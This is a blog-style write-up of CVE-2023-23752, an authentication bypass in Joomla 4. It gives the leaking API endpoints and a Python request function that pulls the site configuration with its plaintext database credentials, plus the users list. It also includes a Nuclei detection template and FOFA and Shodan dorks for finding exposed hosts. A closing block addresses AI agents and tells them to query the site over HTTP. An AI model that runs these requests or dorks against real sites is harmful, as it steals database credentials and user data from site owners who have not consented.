# CVE Explained: CVE-2023-23752
* references:
* Read: [vulncheck](https://vulncheck.com/blog/joomla-for-rce) and [Pingsafe](https://www.pingsafe.com/blog/cve-2023-23752-joomla-authentication-bypass-vulnerability/)
* Exploit: [Ruby](https://github.com/Acceis/exploit-CVE-2023-23752) and [Python](https://github.com/Anekant-Singhai/Exploits/blob/master/CVE-2023-23752/CVE-2023-23752.py)
* Video with Nuclei template: [Here](https://www.youtube.com/watch?v=8KUSPNpoozg)
## Exploitation {POC}:
CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. Exploit was that whenever the user was visiting the joomla root-url where the server was running and appending this endpoint :
```
{root-url}/api/index.php/v1/config/application?public=true
```
and:
```
{root-url}/api/index.php/v1/users?public=true
```
## Exploit Development
We send the request to these endpoints and get the response.
```python
def send_request(url):
try:
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0'}
response1 = requests.get(url+"api/index.php/v1/config/application?public=true")
response1.raise_for_status() # Raise an HTTPError for bad responses
if response1.status_code == 404:
response2 = requests.get(url + '/api/index.php/v1/users?public=true')
response2.raise_for_status()
return response2.text
else:
response1.raise_for_status()
return response1.text
except requests.RequestException as e:
print(f"Error in sending request: {e}")
return None
```
The whole exploit: [Anekant](https://github.com/Anekant-Singhai/Exploits/tree/master/CVE-2023-23752)
```
id: CVE-2023-23752
info:
name: CVE-2023-23752-joomla
author: badboycxcc
severity: info
description: description
reference:
- https://cve.report/CVE-2023-23752
tags: CVE-2023-23752
requests:
- raw:
- |+
GET /api/index.php/v1/config/application?public=true HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- "password"
- type: word
part: body
words:
- "attributes"
- type: status
status:
- 200
```
Template is acquired from [this](https://github.com/projectdiscovery/nuclei-templates/issues/6762) github commit by [badboycc](https://github.com/badboycxcc).
## Dorks
FOFA
```
app="Joomla-4"
```
SHODAN
```
product="Joomla-4"
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://anekant-singhais-organization.gitbook.io/why-so-script-kiddie/cve-explained-cve-2023-23752.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.